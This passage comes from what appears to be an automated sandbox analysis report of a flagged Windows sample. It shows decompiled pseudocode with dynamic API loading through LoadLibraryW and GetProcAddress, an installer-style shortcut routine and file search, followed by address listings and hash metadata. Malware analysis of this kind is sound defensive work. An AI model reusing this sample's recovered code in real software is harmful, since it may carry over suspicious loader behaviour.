                                  							__eflags = _t226 - _t283;
                                  							 *(_t332 + 0x1008) = _t226;
                                  							if(_t226 != _t283) {
                                  								L171:
                                  								_t192 = _t332 + 0x808; // 0x808
                                  								_t325 = _t192;
                                  								_t227 = E732F16BD( *(_t332 + 0x1008), _t325);
                                  								__eflags = _t227 - _t283;
                                  								 *(_t332 + 0x100c) = _t227;
                                  								if(_t227 == _t283) {
                                  									__eflags =  *_t325 - 0x23;
                                  									if( *_t325 == 0x23) {
                                  										_t195 = _t332 + 0x80a; // 0x80a
                                  										_t231 = E732F13B1(_t195);
                                  										__eflags = _t231 - _t283;
                                  										if(_t231 != _t283) {
                                  											__eflags = _t231 & 0xffff0000;
                                  											if((_t231 & 0xffff0000) == 0) {
                                  												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                  											}
                                  										}
                                  									}
                                  								}
                                  								__eflags = _v52 - _t283;
                                  								if(_v52 != _t283) {
                                  									L178:
                                  									_t325[lstrlenW(_t325)] = 0x57;
                                  									_t229 = E732F16BD( *(_t332 + 0x1008), _t325);
                                  									__eflags = _t229 - _t283;
                                  									if(_t229 != _t283) {
                                  										L166:
                                  										 *(_t332 + 0x100c) = _t229;
                                  										goto L182;
                                  									}
                                  									__eflags =  *(_t332 + 0x100c) - _t283;
                                  									L180:
                                  									if(__eflags != 0) {
                                  										goto L182;
                                  									}
                                  									L181:
                                  									_t206 = _t332 + 4;
                                  									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                  									__eflags =  *_t206;
                                  									goto L182;
                                  								} else {
                                  									__eflags =  *(_t332 + 0x100c) - _t283;
                                  									if( *(_t332 + 0x100c) != _t283) {
                                  										goto L182;
                                  									}
                                  									goto L178;
                                  								}
                                  							}
                                  							_t234 = LoadLibraryW(_t324);
                                  							__eflags = _t234 - _t283;
                                  							 *(_t332 + 0x1008) = _t234;
                                  							if(_t234 == _t283) {
                                  								goto L181;
                                  							}
                                  							goto L171;
                                  						}
                                  						_t188 = _t332 + 0x808; // 0x808
                                  						_t236 = E732F13B1(_t188);
                                  						 *(_t332 + 0x100c) = _t236;
                                  						__eflags = _t236 - _t283;
                                  						goto L180;
                                  					}
                                  					_t237 = _t225 - 1;
                                  					if(_t237 == 0) {
                                  						_t185 = _t332 + 0x808; // 0x808
                                  						_t238 = _t185;
                                  						__eflags =  *_t238 - _t283;
                                  						if( *_t238 == _t283) {
                                  							goto L182;
                                  						}
                                  						_t229 = E732F13B1(_t238);
                                  						L165:
                                  						goto L166;
                                  					}
                                  					if(_t237 != 1) {
                                  						goto L182;
                                  					}
                                  					_t81 = _t332 + 8; // 0x8
                                  					_t284 = _t81;
                                  					_t326 = E732F13B1(_t81);
                                  					 *(_t332 + 0x1008) = _t326;
                                  					if(_t326 == 0) {
                                  						goto L181;
                                  					}
                                  					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                  					 *((intOrPtr*)(_t332 + 0x1050)) = E732F12CC(_t284);
                                  					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                  					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                  					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                  					_t90 = _t332 + 0x808; // 0x808
                                  					_t229 =  *(_t326->i + E732F13B1(_t90) * 4);
                                  					goto L165;
                                  				}
                                  			}

































































                                  0x732f1c07
                                  0x732f1c0a
                                  0x732f1c0d
                                  0x732f1c10
                                  0x732f1c13
                                  0x732f1c16
                                  0x732f1c19
                                  0x732f1c1b
                                  0x732f1c1e
                                  0x732f1c21
                                  0x732f1c26
                                  0x732f1c29
                                  0x732f1c31
                                  0x732f1c39
                                  0x732f1c3b
                                  0x732f1c3e
                                  0x732f1c46
                                  0x732f1c46
                                  0x732f1c4b
                                  0x732f1c4e
                                  0x00000000
                                  0x00000000
                                  0x732f1c5b
                                  0x732f1c60
                                  0x732f1c62
                                  0x732f1cf4
                                  0x732f1cf4
                                  0x732f1cf4
                                  0x732f1cf8
                                  0x732f1cfb
                                  0x732f1cfd
                                  0x732f1d1f
                                  0x732f1d21
                                  0x732f1d24
                                  0x732f1d33
                                  0x732f1d35
                                  0x732f1d3b
                                  0x732f1d3b
                                  0x732f1d41
                                  0x732f1d44
                                  0x732f1d44
                                  0x732f1d47
                                  0x732f1d47
                                  0x732f1d4d
                                  0x732f1d4f
                                  0x732f1d4f
                                  0x732f1d51
                                  0x732f1d54
                                  0x732f1d57
                                  0x732f1d5d
                                  0x732f1d63
                                  0x732f1d66
                                  0x732f1d8a
                                  0x732f1d8d
                                  0x00000000
                                  0x00000000
                                  0x732f1d90
                                  0x732f1d92
                                  0x732f1da0
                                  0x732f1da3
                                  0x732f1da5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1da7
                                  0x732f1da7
                                  0x732f1da7
                                  0x732f1dad
                                  0x732f1daf
                                  0x00000000
                                  0x00000000
                                  0x732f1db1
                                  0x732f1db3
                                  0x732f1db5
                                  0x732f1db7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1db7
                                  0x732f1db9
                                  0x732f1dbb
                                  0x732f1dbd
                                  0x732f1dbd
                                  0x732f1dc3
                                  0x732f1dc9
                                  0x732f1dcb
                                  0x732f1ddf
                                  0x732f1ddf
                                  0x732f1de1
                                  0x732f1dcd
                                  0x732f1dd3
                                  0x732f1dd6
                                  0x732f1dd6
                                  0x00000000
                                  0x732f1d68
                                  0x732f1d68
                                  0x732f1d68
                                  0x732f1d69
                                  0x732f1d71
                                  0x732f1d75
                                  0x732f1d7b
                                  0x732f1d7f
                                  0x00000000
                                  0x732f1d7f
                                  0x732f1d6b
                                  0x732f1d6b
                                  0x732f1d6c
                                  0x00000000
                                  0x00000000
                                  0x732f1d6e
                                  0x732f1d6f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1d6f
                                  0x732f1cff
                                  0x732f1d00
                                  0x732f1d09
                                  0x732f1d0c
                                  0x732f1d19
                                  0x732f1d19
                                  0x732f1d0e
                                  0x732f1d0e
                                  0x732f1de7
                                  0x732f1dea
                                  0x732f1dee
                                  0x732f1e61
                                  0x732f1e65
                                  0x732f1c43
                                  0x00000000
                                  0x732f1c43
                                  0x00000000
                                  0x732f1e65
                                  0x732f1cfd
                                  0x732f1c68
                                  0x732f1c6b
                                  0x732f1cce
                                  0x732f1cd1
                                  0x732f1ce3
                                  0x732f1ce3
                                  0x732f1ce6
                                  0x732f1df3
                                  0x732f1df6
                                  0x732f1df6
                                  0x732f1df8
                                  0x732f21ae
                                  0x732f21c6
                                  0x732f21c6
                                  0x732f21c9
                                  0x00000000
                                  0x00000000
                                  0x732f21b3
                                  0x732f21b4
                                  0x732f21b7
                                  0x732f21ba
                                  0x732f2244
                                  0x732f224b
                                  0x732f2251
                                  0x732f2255
                                  0x732f1e5c
                                  0x732f1e5d
                                  0x732f1e5d
                                  0x732f1e5e
                                  0x00000000
                                  0x732f1e5e
                                  0x732f21c0
                                  0x732f21c3
                                  0x732f21c3
                                  0x732f21cb
                                  0x732f21ce
                                  0x732f2238
                                  0x732f1e51
                                  0x732f1e54
                                  0x732f1e57
                                  0x732f1e5a
                                  0x732f1e5a
                                  0x00000000
                                  0x732f1e5a
                                  0x732f21d0
                                  0x732f21d3
                                  0x732f21da
                                  0x732f21da
                                  0x732f21dd
                                  0x732f21e1
                                  0x732f21f5
                                  0x732f21f5
                                  0x732f21f8
                                  0x732f21fc
                                  0x00000000
                                  0x00000000
                                  0x732f21fe
                                  0x732f2202
                                  0x00000000
                                  0x00000000
                                  0x732f2204
                                  0x732f220b
                                  0x732f220b
                                  0x732f2211
                                  0x732f2214
                                  0x732f2230
                                  0x732f2216
                                  0x732f221f
                                  0x732f2222
                                  0x732f2222
                                  0x00000000
                                  0x732f2214
                                  0x732f21e3
                                  0x732f21e6
                                  0x732f21ea
                                  0x00000000
                                  0x00000000
                                  0x732f21ec
                                  0x00000000
                                  0x732f21ec
                                  0x732f21d5
                                  0x732f21d8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f21d8
                                  0x732f1dfe
                                  0x732f1dfe
                                  0x732f1dff
                                  0x732f1f49
                                  0x732f1f49
                                  0x732f1f50
                                  0x732f1f53
                                  0x00000000
                                  0x00000000
                                  0x732f1f60
                                  0x00000000
                                  0x732f214b
                                  0x732f214e
                                  0x732f2151
                                  0x732f2151
                                  0x732f2152
                                  0x732f2153
                                  0x732f2156
                                  0x732f2159
                                  0x732f215c
                                  0x00000000
                                  0x00000000
                                  0x732f215e
                                  0x732f215e
                                  0x732f2162
                                  0x732f217a
                                  0x732f217d
                                  0x732f2181
                                  0x732f2187
                                  0x00000000
                                  0x732f2187
                                  0x732f2164
                                  0x732f2164
                                  0x732f2167
                                  0x00000000
                                  0x00000000
                                  0x732f2169
                                  0x732f216c
                                  0x732f216e
                                  0x732f216f
                                  0x732f216f
                                  0x732f216f
                                  0x732f2170
                                  0x732f2173
                                  0x732f2176
                                  0x732f2177
                                  0x732f2151
                                  0x732f2152
                                  0x732f2153
                                  0x732f2156
                                  0x732f2159
                                  0x732f215c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f215c
                                  0x00000000
                                  0x732f1fa7
                                  0x00000000
                                  0x00000000
                                  0x732f1fb3
                                  0x00000000
                                  0x00000000
                                  0x732f1f9a
                                  0x732f1f9e
                                  0x732f1fa2
                                  0x00000000
                                  0x00000000
                                  0x732f211c
                                  0x732f2120
                                  0x00000000
                                  0x00000000
                                  0x732f2126
                                  0x732f212f
                                  0x732f2136
                                  0x732f213e
                                  0x00000000
                                  0x00000000
                                  0x732f2083
                                  0x732f2083
                                  0x00000000
                                  0x00000000
                                  0x732f1fbc
                                  0x00000000
                                  0x00000000
                                  0x732f21a6
                                  0x00000000
                                  0x00000000
                                  0x732f208b
                                  0x732f208d
                                  0x732f208d
                                  0x00000000
                                  0x00000000
                                  0x732f2196
                                  0x00000000
                                  0x00000000
                                  0x732f219a
                                  0x00000000
                                  0x00000000
                                  0x732f21a2
                                  0x00000000
                                  0x00000000
                                  0x732f20d3
                                  0x732f20d5
                                  0x732f20d5
                                  0x00000000
                                  0x00000000
                                  0x732f209d
                                  0x732f209f
                                  0x732f209f
                                  0x00000000
                                  0x00000000
                                  0x732f20af
                                  0x732f20b1
                                  0x732f20b1
                                  0x00000000
                                  0x00000000
                                  0x732f20e1
                                  0x732f20e3
                                  0x732f20e3
                                  0x00000000
                                  0x00000000
                                  0x732f20ba
                                  0x732f20bc
                                  0x732f20bc
                                  0x00000000
                                  0x00000000
                                  0x732f20c1
                                  0x00000000
                                  0x00000000
                                  0x732f219e
                                  0x732f21a8
                                  0x732f21a8
                                  0x00000000
                                  0x00000000
                                  0x732f20ec
                                  0x732f20f0
                                  0x732f20f5
                                  0x732f20f8
                                  0x732f20f9
                                  0x732f20fc
                                  0x732f2102
                                  0x732f2102
                                  0x00000000
                                  0x00000000
                                  0x732f218e
                                  0x00000000
                                  0x00000000
                                  0x732f20c5
                                  0x732f20c7
                                  0x732f20c7
                                  0x00000000
                                  0x00000000
                                  0x732f1fc3
                                  0x732f1fc3
                                  0x00000000
                                  0x00000000
                                  0x732f20da
                                  0x732f20dc
                                  0x732f20dc
                                  0x00000000
                                  0x00000000
                                  0x732f1f67
                                  0x732f1f6d
                                  0x732f1f70
                                  0x732f1f72
                                  0x732f1f72
                                  0x732f1f75
                                  0x732f1f79
                                  0x732f1f86
                                  0x732f1f88
                                  0x732f1f8e
                                  0x732f1f8e
                                  0x732f1f8e
                                  0x00000000
                                  0x00000000
                                  0x732f208e
                                  0x732f208e
                                  0x732f2090
                                  0x732f2097
                                  0x00000000
                                  0x00000000
                                  0x732f20d6
                                  0x732f20d6
                                  0x00000000
                                  0x00000000
                                  0x732f20a0
                                  0x732f20a0
                                  0x732f20a2
                                  0x732f20a9
                                  0x00000000
                                  0x00000000
                                  0x732f20b2
                                  0x732f20b2
                                  0x732f20b4
                                  0x00000000
                                  0x00000000
                                  0x732f20e4
                                  0x732f20e4
                                  0x00000000
                                  0x00000000
                                  0x732f20bd
                                  0x732f20bd
                                  0x00000000
                                  0x00000000
                                  0x732f210a
                                  0x732f210e
                                  0x732f2113
                                  0x732f2116
                                  0x00000000
                                  0x00000000
                                  0x732f20c8
                                  0x732f20c8
                                  0x732f20cb
                                  0x732f20cd
                                  0x00000000
                                  0x00000000
                                  0x732f20dd
                                  0x732f20dd
                                  0x732f20e6
                                  0x732f20e6
                                  0x732f1fc5
                                  0x732f1fc5
                                  0x732f1fc8
                                  0x732f1fcf
                                  0x732f1fd1
                                  0x732f1fd3
                                  0x732f1fda
                                  0x732f1fdd
                                  0x732f1fe2
                                  0x732f1fe4
                                  0x732f1fe6
                                  0x732f1fea
                                  0x732f1ff0
                                  0x732f1ff6
                                  0x732f1ff6
                                  0x732f1ff8
                                  0x732f1ff8
                                  0x732f1ff9
                                  0x732f1ff9
                                  0x732f1ffd
                                  0x732f2003
                                  0x732f2005
                                  0x732f2009
                                  0x732f200e
                                  0x732f200e
                                  0x732f2010
                                  0x732f2010
                                  0x732f2013
                                  0x732f2016
                                  0x732f201f
                                  0x732f2025
                                  0x732f2028
                                  0x732f2028
                                  0x732f202a
                                  0x732f202d
                                  0x732f2033
                                  0x732f2039
                                  0x732f2039
                                  0x732f203b
                                  0x00000000
                                  0x00000000
                                  0x732f2041
                                  0x732f2041
                                  0x732f2045
                                  0x732f204c
                                  0x732f2070
                                  0x732f2070
                                  0x732f2074
                                  0x732f2076
                                  0x732f2079
                                  0x732f2079
                                  0x732f207c
                                  0x732f207c
                                  0x00000000
                                  0x732f2074
                                  0x732f2051
                                  0x732f2054
                                  0x732f2054
                                  0x732f205b
                                  0x732f205d
                                  0x732f2060
                                  0x732f2067
                                  0x732f2068
                                  0x732f206e
                                  0x732f206e
                                  0x00000000
                                  0x732f206e
                                  0x732f2062
                                  0x732f2065
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f2065
                                  0x732f1ff2
                                  0x732f1ff4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1f60
                                  0x732f1e05
                                  0x732f1e05
                                  0x732f1e06
                                  0x732f1f46
                                  0x00000000
                                  0x732f1f46
                                  0x732f1e0c
                                  0x732f1e0d
                                  0x00000000
                                  0x00000000
                                  0x732f1e13
                                  0x732f1e16
                                  0x732f1f0b
                                  0x732f1f0b
                                  0x732f1f0e
                                  0x732f1f23
                                  0x732f1f25
                                  0x732f1f25
                                  0x732f1f26
                                  0x732f1f29
                                  0x732f1f2c
                                  0x732f1f38
                                  0x732f1f38
                                  0x732f1f38
                                  0x732f1f2e
                                  0x732f1f2e
                                  0x732f1f2e
                                  0x732f1f3e
                                  0x00000000
                                  0x732f1f3e
                                  0x732f1f10
                                  0x732f1f10
                                  0x732f1f11
                                  0x732f1f1f
                                  0x00000000
                                  0x732f1f1f
                                  0x732f1f14
                                  0x732f1f15
                                  0x00000000
                                  0x00000000
                                  0x732f1f1b
                                  0x00000000
                                  0x732f1f1b
                                  0x732f1e1c
                                  0x732f1f07
                                  0x00000000
                                  0x732f1f07
                                  0x732f1e22
                                  0x732f1e22
                                  0x732f1e25
                                  0x732f1e4e
                                  0x00000000
                                  0x732f1e4e
                                  0x732f1e27
                                  0x732f1e27
                                  0x732f1e2a
                                  0x732f1e44
                                  0x00000000
                                  0x732f1e44
                                  0x732f1e2c
                                  0x732f1e2c
                                  0x732f1e2f
                                  0x732f1e3e
                                  0x00000000
                                  0x732f1e3e
                                  0x732f1e32
                                  0x732f1e33
                                  0x00000000
                                  0x00000000
                                  0x732f1e35
                                  0x00000000
                                  0x732f1cec
                                  0x732f1cec
                                  0x732f1cef
                                  0x00000000
                                  0x732f1cef
                                  0x732f1ce6
                                  0x732f1cd3
                                  0x732f1cd8
                                  0x00000000
                                  0x00000000
                                  0x732f1cda
                                  0x732f1cdd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1cdd
                                  0x732f1c6d
                                  0x732f1c70
                                  0x732f1ca6
                                  0x732f1ca9
                                  0x00000000
                                  0x732f1caf
                                  0x732f1cb1
                                  0x732f1cb5
                                  0x732f1cbc
                                  0x732f1cc3
                                  0x732f1cc6
                                  0x732f1cc9
                                  0x00000000
                                  0x732f1cc9
                                  0x732f1ca9
                                  0x732f1c72
                                  0x732f1c73
                                  0x732f1c8e
                                  0x732f1c91
                                  0x00000000
                                  0x732f1c97
                                  0x732f1c97
                                  0x732f1c9e
                                  0x732f1ca1
                                  0x00000000
                                  0x732f1ca1
                                  0x732f1c91
                                  0x732f1c78
                                  0x00000000
                                  0x732f1c7e
                                  0x732f1c7e
                                  0x732f1c85
                                  0x00000000
                                  0x732f1c85
                                  0x732f1c78
                                  0x732f1e74
                                  0x732f1e79
                                  0x732f1e7e
                                  0x732f1e82
                                  0x732f2355
                                  0x732f235b
                                  0x732f1e94
                                  0x732f1e96
                                  0x732f1e97
                                  0x732f227e
                                  0x732f227e
                                  0x732f2281
                                  0x732f2284
                                  0x732f22a1
                                  0x732f22a7
                                  0x732f22a9
                                  0x732f22af
                                  0x732f22c6
                                  0x732f22c6
                                  0x732f22c6
                                  0x732f22d3
                                  0x732f22d9
                                  0x732f22dc
                                  0x732f22e2
                                  0x732f22e4
                                  0x732f22e8
                                  0x732f22ea
                                  0x732f22f1
                                  0x732f22f6
                                  0x732f22f9
                                  0x732f22fb
                                  0x732f2300
                                  0x732f2312
                                  0x732f2312
                                  0x732f2300
                                  0x732f22f9
                                  0x732f22e8
                                  0x732f2318
                                  0x732f231b
                                  0x732f2325
                                  0x732f232d
                                  0x732f233a
                                  0x732f2340
                                  0x732f2343
                                  0x732f2273
                                  0x732f2273
                                  0x00000000
                                  0x732f2273
                                  0x732f2349
                                  0x732f234f
                                  0x732f234f
                                  0x00000000
                                  0x00000000
                                  0x732f2351
                                  0x732f2351
                                  0x732f2351
                                  0x732f2351
                                  0x00000000
                                  0x732f231d
                                  0x732f231d
                                  0x732f2323
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f2323
                                  0x732f231b
                                  0x732f22b2
                                  0x732f22b8
                                  0x732f22ba
                                  0x732f22c0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f22c0
                                  0x732f2286
                                  0x732f228d
                                  0x732f2293
                                  0x732f2299
                                  0x00000000
                                  0x732f2299
                                  0x732f1e9d
                                  0x732f1e9e
                                  0x732f225d
                                  0x732f225d
                                  0x732f2263
                                  0x732f2266
                                  0x00000000
                                  0x00000000
                                  0x732f226d
                                  0x732f2272
                                  0x00000000
                                  0x732f2272
                                  0x732f1ea5
                                  0x00000000
                                  0x00000000
                                  0x732f1eab
                                  0x732f1eab
                                  0x732f1eb4
                                  0x732f1eb9
                                  0x732f1ebf
                                  0x00000000
                                  0x00000000
                                  0x732f1ec5
                                  0x732f1ed2
                                  0x732f1ed8
                                  0x732f1ee2
                                  0x732f1ee8
                                  0x732f1ef0
                                  0x732f1f00
                                  0x00000000
                                  0x732f1f00

                                  APIs
                                    • Part of subcall function 732F12BB: GlobalAlloc.KERNELBASE(00000040,?,732F12DB,?,732F137F,00000019,732F11CA,-000000A0), ref: 732F12C5
                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 732F1D2D
                                  • lstrcpyW.KERNEL32 ref: 732F1D75
                                  • lstrcpyW.KERNEL32 ref: 732F1D7F
                                  • GlobalFree.KERNEL32 ref: 732F1D92
                                  • GlobalFree.KERNEL32 ref: 732F1E74
                                  • GlobalFree.KERNEL32 ref: 732F1E79
                                  • GlobalFree.KERNEL32 ref: 732F1E7E
                                  • GlobalFree.KERNEL32 ref: 732F2068
                                  • lstrcpyW.KERNEL32 ref: 732F2222
                                  • GetModuleHandleW.KERNEL32(00000008), ref: 732F22A1
                                  • LoadLibraryW.KERNEL32(00000008), ref: 732F22B2
                                  • GetProcAddress.KERNEL32(?,?), ref: 732F230C
                                  • lstrlenW.KERNEL32(00000808), ref: 732F2326
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                  • String ID:
                                  • API String ID: 245916457-0
                                  • Opcode ID: 11961d569108675c24ef9b10696391c101036368685b10da43fc02a250bc422b
                                  • Instruction ID: 383495b7112434342048c4d5ffaa9b3eaac9ba30ba14f07ebb1ce2ae5deae9de
                                  • Opcode Fuzzy Hash: 11961d569108675c24ef9b10696391c101036368685b10da43fc02a250bc422b
                                  • Instruction Fuzzy Hash: 71228875E1030BDBDB11DFA4C5807AEF7B4FB09315F94452ED1A6E2284D7B8AAC18B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E004021AA(void* __eflags) {
                                  				signed int _t52;
                                  				void* _t56;
                                  				intOrPtr* _t60;
                                  				intOrPtr _t61;
                                  				intOrPtr* _t62;
                                  				intOrPtr* _t64;
                                  				intOrPtr* _t66;
                                  				intOrPtr* _t68;
                                  				intOrPtr* _t70;
                                  				intOrPtr* _t72;
                                  				intOrPtr* _t74;
                                  				intOrPtr* _t76;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t80;
                                  				void* _t83;
                                  				intOrPtr* _t91;
                                  				signed int _t101;
                                  				signed int _t105;
                                  				void* _t107;
                                  
                                  				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                  				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                  				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                  				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                  				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                  				_t52 =  *(_t107 - 0x20);
                                  				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                  				_t101 = _t52 & 0x00008000;
                                  				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                  				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                  				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                  					E00402DA6(0x21);
                                  				}
                                  				_t56 = _t107 + 8;
                                  				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                  				if(_t56 < _t83) {
                                  					L14:
                                  					 *((intOrPtr*)(_t107 - 4)) = 1;
                                  					_push(0xfffffff0);
                                  				} else {
                                  					_t60 =  *((intOrPtr*)(_t107 + 8));
                                  					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                  					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                  					if(_t61 >= _t83) {
                                  						_t64 =  *((intOrPtr*)(_t107 + 8));
                                  						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                  						if(_t101 == _t83) {
                                  							_t80 =  *((intOrPtr*)(_t107 + 8));
                                  							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
                                  						}
                                  						if(_t105 != _t83) {
                                  							_t78 =  *((intOrPtr*)(_t107 + 8));
                                  							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                  						}
                                  						_t66 =  *((intOrPtr*)(_t107 + 8));
                                  						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                  						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                  						if( *_t91 != _t83) {
                                  							_t76 =  *((intOrPtr*)(_t107 + 8));
                                  							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                  						}
                                  						_t68 =  *((intOrPtr*)(_t107 + 8));
                                  						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                  						_t70 =  *((intOrPtr*)(_t107 + 8));
                                  						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                  						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                  							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                  							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                  						}
                                  						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                  						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                  					}
                                  					_t62 =  *((intOrPtr*)(_t107 + 8));
                                  					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                  					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                  						_push(0xfffffff4);
                                  					} else {
                                  						goto L14;
                                  					}
                                  				}
                                  				E00401423();
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                  				return 0;
                                  			}






















                                  0x004021b3
                                  0x004021bd
                                  0x004021c7
                                  0x004021d1
                                  0x004021dc
                                  0x004021df
                                  0x004021f9
                                  0x004021fc
                                  0x00402202
                                  0x00402205
                                  0x0040220f
                                  0x00402213
                                  0x00402213
                                  0x00402218
                                  0x00402229
                                  0x00402231
                                  0x004022e8
                                  0x004022e8
                                  0x004022ef
                                  0x00402237
                                  0x00402237
                                  0x00402246
                                  0x0040224a
                                  0x0040224d
                                  0x00402253
                                  0x00402261
                                  0x00402264
                                  0x00402266
                                  0x00402271
                                  0x00402271
                                  0x00402276
                                  0x00402278
                                  0x0040227f
                                  0x0040227f
                                  0x00402282
                                  0x0040228b
                                  0x0040228e
                                  0x00402294
                                  0x00402296
                                  0x004022a0
                                  0x004022a0
                                  0x004022a3
                                  0x004022ac
                                  0x004022af
                                  0x004022b8
                                  0x004022be
                                  0x004022c0
                                  0x004022ce
                                  0x004022ce
                                  0x004022d1
                                  0x004022d7
                                  0x004022d7
                                  0x004022da
                                  0x004022e0
                                  0x004022e6
                                  0x004022fb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004022e6
                                  0x004022f1
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID: C:\Users\user\AppData\Local\Temp
                                  • API String ID: 542301482-47812868
                                  • Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                  • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                  • Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                  • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E0040290B(short __ebx, short* __edi) {
                                  				void* _t21;
                                  
                                  				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                  					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                  					_push(_t21 - 0x2b0);
                                  					_push(__edi);
                                  					E0040653D();
                                  				} else {
                                  					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                  					 *__edi = __ebx;
                                  					 *((intOrPtr*)(_t21 - 4)) = 1;
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                  				return 0;
                                  			}




                                  0x00402923
                                  0x0040293e
                                  0x00402949
                                  0x0040294a
                                  0x00402a94
                                  0x00402925
                                  0x00402928
                                  0x0040292b
